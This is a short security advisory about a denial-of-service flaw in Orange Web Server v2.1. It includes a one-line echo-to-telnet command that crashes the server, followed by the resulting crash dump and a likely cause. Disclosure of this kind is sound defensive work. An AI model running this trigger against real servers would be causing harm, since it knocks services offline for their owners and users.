Vulnerability

    Orange Web Server

Affected

    Orange Web Server v2.1

Description

    'slipy' found following.  Orange Web Server v2.1 is a powerful yet
    light-weight web server that runs on all Windows platforms.   Easy
    to setup and  use, Orange Web  Server can turn  any PC into  a web
    server.  The httpd is based on GoAhead (c) Technology.

    Orange Web Server  v2.1 is vulnerable  to a very  simple Denial of
    Service attack where its possible to cause the server to shut down
    at once and cause  a invalid page fault.   This is a very  strange
    DoS, see example.  Examples:

        echo "GET A" | telnet 192.168.0.20 80

    That simple echo & pipe will cause this:

        ORANGEWEBSERVER caused an invalid page fault
        in module ORANGEWEBSERVER.EXE at
        016f:00409694.
        Registers:
        EAX=49703d50 CS=016f EIP=00409694
        EFLGS=00010246 EBX=009dfe84 SS=0177
        ESP=009dfbb8 EBP=009dfe8c ECX=00000000
        DS=0177 ESI=00416362 FS=84cf EDX=00000000
        ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
        f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24
        Stack dump:
        00416350 004094a7 00000000 00416350 ffffffff
        009dfbf0 009dfe8c 009dfe84 00418644 ffffffff
        006d8e8c 00410b62 00000000 00416350 006d949c
        00000000

    It seems that when closing a TCP/IP connection very quickly  after
    creating it, it is possible for a server to try to send data to  a
    closed  connection  repeatedly   without  proper  error   checking
    (people don't expect  a connection to  die instantly after  it was
    created).   Under  UNIX,  you  can  catch  or  ignore SIGPIPE as a
    stopgap solution.  Windows will probably have something similar.

Solution

    Vendor has been notified, and waiting for a reply.